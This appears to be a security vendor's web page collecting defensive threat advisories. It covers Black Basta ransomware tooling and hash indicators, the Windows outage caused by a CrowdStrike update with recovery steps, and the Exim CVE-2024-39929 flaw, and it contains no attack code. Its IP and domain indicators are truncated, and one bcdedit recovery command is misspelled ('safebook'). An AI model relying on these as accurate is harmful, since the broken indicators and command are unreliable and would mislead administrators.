Black Basta Ransomware Gang Changes Tactics

Black Basta Ransomware Gang Changes Tactics

DOWNLOAD PDF

Summary

The Black Basta ransomware gang has changed tactics since the disruption of its partner QBot. The group is now employing new custom malware and leveraging various tools to evade detection and enhance their attack capabilities.

 

Technical Details

Black Basta is a ransomware operator known for double-extortion campaigns, combining data theft with encryption to demand large ransom payments. After the QBot botnet disruption, the group formed new alliances with those affiliated with DarkGate malware and SilentNight. Mandiant tracks the Black Basta group as UNC4393 and highlights their use of new malware and tools in their operations, indicating their evolution and continued threat.

In late 2023, Black Basta turned to other initial access distribution methods, specifically those related to DarkGate malware. They later shifted to using SilentNight, a versatile backdoor malware delivered through malvertising. This change also marked the group’s move away from phishing as their primary initial access method. Mandiant reports that Black Basta has transitioned from publicly available tools to internally developed custom malware.

Earlier this year, UNC4393 was observed deploying a custom memory-only dropper named DawnCry, initiating a multi-stage infection process that led to the deployment of DaveShell and PortYard tunneler. PortYard, a custom tool, establishes connections to Black Basta’s command and control (C2) infrastructure and proxies traffic.

Tools used by Black Basta include:

  • BASTA: A C++ ransomware that encrypts local files using ChaCha20/XChaCha20 and appends an encrypted key to each file.
  • SYSTEMBC: A C tunneler that acts as a proxy between a C2 server and remote systems, retrieving additional payloads and hiding network traffic.
  • KNOTWRAP: A memory-only dropper in C/C++ that decrypts and executes additional payloads in memory with advanced obfuscation techniques.
  • KNOTROCK: A .NET utility that creates symbolic links on network shares and executes the BASTA ransomware with the link path.
  • DAWNCRY: A memory-only dropper that decrypts an embedded resource into memory using a hard-coded key, containing shellcode and a DAVESHELL loader.
  • PORTYARD: A tunneler that connects to a hard-coded C2 server, establishing TCP connections to relay servers and proxying traffic.
  • COGSCAN: A .NET reconnaissance tool used to gather information on available network hosts.

 

Additionally, Black Basta continues to use “living off the land” binaries and readily available tools, including the Windows certutil command-line utility to download SilentNight and the Rclone tool to exfiltrate data.

 

Indicators of Compromise (IOCs)

Hashes

  • a9447a25ab79eed2942997daced4eb3e
  • d9c69ce1ba4c5411482ec014c8be40e3320e778e
  • 021921800888bc174c40c2407c0ea010f20e6d32c596ed3286ebfe7bd641dd79
  • af35580a4c293ba23dfe48c03ba1d949
  • 77a9ec4ccd9ef76f376e04ce338170685cc26c95
  • 1ede3018667af92918ad728f2bfd222d8e71826219c3d8374150cce772f0f7c2
  • d4fd61c1bb582b77a87259bcd44178d4
  • eead781343d33e0e0e9f998b963ecc8e8032ec31
  • 23317330e82ce09b44c8142ed8efc2e068d595071053081bc438604eb0f28b41
  • 387864bc379e0017c30fc5f608ac9868
  • d3c4163a35204eee15bce9a08825c7e9bc0666ad
  • 3c65da7f7bfdaf9acc6445abbedd9c4e927d37bb9e3629f34afc338058680407
  • b2af1cd157221f240ce8f8fa88bf6d44
  • 65a7fee21eb8842b34e729fc43b668e69905d1ac
  • 50400d432452dca3de821d0c3323f62c90d6786abd6db5c1642b37a6b11312a7
  • 25dd591a343e351fd72b6278ebf8197e
  • 815e7090399df8b9a326c77bb03684f87252c437
  • 6381559b7dcdac967085712b8dd016730ab142170a9526cc8daf601f36d826b4
  • 3d339c1499363d7571073f9347c9fdb6
  • 88437e51dd3872af3658b57e7f489758e8cbf31d
  • 6f78256f20eb2b5594391095a341f8749395e7566fdd2ddd3a34a0db9bb9f871
  • 286394d06972734946774c85742a094f
  • 616415b3ec0c08511d232e56b51faf7a03c45183
  • 8501e14ee6ee142122746333b936c9ab0fc541328f37b5612b6804e6cdc2c2c6
  • c451ffca71ef1433e1208779c126ef20
  • 506db9e2b0871253a9a44083d46831145da5dc13
  • 8dd7757da361012d08ce5b33dfa485e256b66cfbc33c35409fd710af8565c284
  • 7bd00958b9caabfc1e426205700b63fc
  • 1eb93896854fe11e47942530ab109a74adb90c2b
  • 93b038797a7f57f38b886395935377b9870c0b7e5db254fa10905149d63f731e

 

IP Addresses

  • 207.146.23
  • 202.235.163
  • 226.2.165
  • 122.36.228
  • 244.110.56
  • 162.141.128
  • 82.26.90
  • 202.30.15
  • 33.179.6
  • 116.145.66

 

Related Domains

  • com
  • com
  • net
  • com
  • com
  • com
  • net
  • net
  • com
  • com

 

Recommendations

  • Implement trusted ad-blocking software to reduce exposure to potentially malicious advertisements.
  • Enforce browser security settings to block pop-ups and restrict JavaScript execution from unknown sources.
  • Keep antivirus and antimalware software up to date to detect and block malicious ads.
  • Implement web filtering solutions to block access to known malicious websites.
  • Educate users about the dangers of malvertising and encourage them to avoid clicking on ads, especially from untrusted sources.
  • Regularly update web browsers and plugins to protect against vulnerabilities that malvertising campaigns may exploit.
  • Deploy EDR solutions to monitor, detect, and respond to suspicious activities on endpoints.
  • Segment the network to limit the spread of malware and protect critical assets.
  • Use tools that perform behavioral analysis to detect anomalies that may indicate the presence of custom malware.
  • Implement application whitelisting to allow only approved software to run on the network.
  • Stay updated with threat intelligence feeds to identify and defend against emerging malware threats.
  • Perform regular backups and ensure they are stored securely to facilitate recovery in case of an attack.
  • Implement MFA to add an extra layer of security, making it more difficult for attackers to gain unauthorized access.
  • Use policies to restrict the execution of scripts (e.g., PowerShell, WScript, CScript) to only trusted administrators.
  • Regularly audit and monitor the use of legitimate tools and binaries to detect unusual activities.
  • Use application control solutions to restrict the use of legitimate tools and binaries that are often exploited by attackers.
  • Apply the principle of least privilege, ensuring users and services have the minimum level of access necessary.
  • Enforce security policies that limit the execution of potentially dangerous tools and binaries.

 

References

 

 

 

2024 North Texas InfraGard Members Alliance Conference

2024 North Texas InfraGard Members Alliance Conference

Blackswan Cybersecurity is proud to sponsor the 2024 InfraGard North Texas Annual Critical Infrastructure Conference at The University of Texas at Dallas on Friday, August 23, 2024.

For over 20 years, members of the leadership team at Blackswan have held various senior positions within InfraGard, including Chapter President, Vice President, Secretary, Treasurer, and Advisory Board Member. If you are planning to attend the conference, please stop by the Blackswan booth to discuss how we can help you mitigate business risk, pick up some free swag, or simply to say ‘hi’.

Register here: https://www.ntinfragard.org/events/north-texas-infragard-members-alliance-conference-2024/

North Texas InfraGard Members Alliance Conference 2024

 

 

 

Black Basta Ransomware Gang Changes Tactics

Threat Advisory *CRITICAL* – CrowdStrike Causing Widespread Global Outages

CrowdStrike Causing Widespread Global Outages

DOWNLOAD PDF

Summary

An update pushed out by CrowdStrike within the past 12 hours has caused widespread outages to Windows environments where CrowdStrike is installed.  This was not an elective update and therefore was applied to every endpoint with internet connectivity.  The impact of this update caused the infamous Blue Screen of Death (BSOD) and will require manual intervention on every device.

QUICK REFERENCE PROTOCOL

Impact

Millions of endpoints globally were rendered inoperable, ranging from the 3 largest airlines, delaying flights, hospital networks, government agencies, and news networks.  Any endpoint with CrowdStrike installed with internet connectivity within the past 12 hours is likely affected.

  • Endpoints running older Windows 7 and 2008 R2 were not impacted
  • Endpoints running Mac or Linux were not impacted.

The channel file “C-00000291*.sys” with a timestamp of 0409 UTC is the problem.

 

Solution

Windows Endpoint (BitLocker not enabled)

  1. “Boot Windows into Safe Mode or the Windows Recovery Environment
  2. Use Windows Explorer or the Command Prompt to “Navigate to the C:\Windows\System32\drivers\CrowdStrike directory
  3. “Locate the file matching ‘C-0000029*.sys’, and delete it.
  4. “Boot the host normally.”

Windows Endpoint (BitLocker enabled)

  1. Boot Windows into Safe Mode or the Windows Recovery Environment
  2. Navigate to Troubleshoot > Advanced Options > Startup Settings
  3. Press “Restart”
  4. Skip the BitLocker recovery key prompt by pressing “Esc”
  5. Skip the next BitLocker recovery key prompt by selecting “Skip This Device”, in the bottom right
  6. Navigate to Troubleshoot > Advanced Options > Command Prompt
  7. Type “bcdedit /set {default} safebook minimal”, then press “Enter”
  8. Go back to the WinRE main menu and select “Continue”
  9. The device may cycle 2 to 3 times
  10. If booted into Safe Mode, log in as usual
  11. Use Windows Explorer to “Navigate to the C:\Windows\System32\drivers\CrowdStrike directory
  12. “Locate the file matching ‘C-00000291*.sys’, and delete it.
  13. Open Command Prompt as Administrator
  14. Type “bcdedit /deletevalue {default} safeboot”. Then Press “Enter”
  15. Restart as normal

Cloud Environment

Option 1

  1. Detach the operating system disk volume from the impacted virtual server
  2. Create a snapshot or backup of the disk volume before proceeding further as a precaution against unintended changes
  3. Attach/mount the volume to to a new virtual server
  4. Navigate to the %WINDIR%\System32\drivers\CrowdStrike directory
  5. Locate the file matching “C-00000291*.sys”, and delete it.
  6. Detach the volume from the new virtual server
  7. Reattach the fixed volume to the impacted virtual server

 

Option 2

  1. Roll back to a snapshot prior to 0409 UTC

 

References

  1. https://mashable.com/article/crowdstrike-crash-microsoft-outage-bsod-fix
  2. https://www.wired.com/story/microsoft-windows-outage-crowdstrike-global-it-probems/
  3. https://www.crowdstrike.com/blog/statement-on-windows-sensor-update/

 

 

 

 

Black Basta Ransomware Gang Changes Tactics

Exim Mail Server Flaw

Exim Mail Server Flaw

DOWNLOAD PDF

Summary

A critical security vulnerability has been identified in the Exim mail transfer agent, potentially allowing attackers to send malicious attachments to users’ inboxes. This flaw (CVE-2024-39929) has a CVSS score of 9.1. The issue was resolved in version 4.98.

THREAT ADVISORY

Technical Details

The vulnerability stems from an improper parsing of multiline RFC2231 header filenames, enabling remote attackers to deliver malicious executable attachments to end users’ mailboxes by bypassing the $mime_filename extension-blocking protection mechanism. Exim, a free mail transfer agent used on Unix and Unix-like operating systems, was first released in 1995 at the University of Cambridge.

According to Censys, there are approximately 4,830,719 public-facing SMTP mail servers running Exim. As of July 12, 2024, 1,563,085 of these Exim servers are running vulnerable versions (4.97.1 or earlier). Most of these vulnerable instances are in the U.S., Russia, and Canada. Censys stated, “The vulnerability could allow a remote attacker to bypass filename extension blocking protection measures and deliver executable attachments directly to end-users’ mailboxes. If a user were to download or run one of these malicious files, the system could be compromised.”

For the attack to succeed, targets must click on an attached executable file. Although there are no reports of active exploitation, users must promptly apply patches to mitigate potential threats. This development comes almost a year after the maintainers of Exim addressed a set of six vulnerabilities that could lead to information disclosure and remote code execution.

 

Recommendations

  • Immediately upgrade to Exim version 4.98 or later to address the vulnerability (CVE-2024-39929).
  • Identify and audit all Exim servers within your network to determine which ones are running vulnerable versions (4.97.1 or earlier).
  • Apply the latest security patches to all identified Exim servers to mitigate the vulnerability.
  • Enable detailed logging and monitoring on Exim servers to detect any unusual activity that may indicate exploitation attempts.
  • Educate users about the risks of downloading and executing attachments from unknown or untrusted sources, emphasizing the importance of cautious behavior.
  • Ensure that email security policies, such as attachment filtering and extension blocking, are properly configured and enforced to prevent similar vulnerabilities from being exploited in the future.

 

References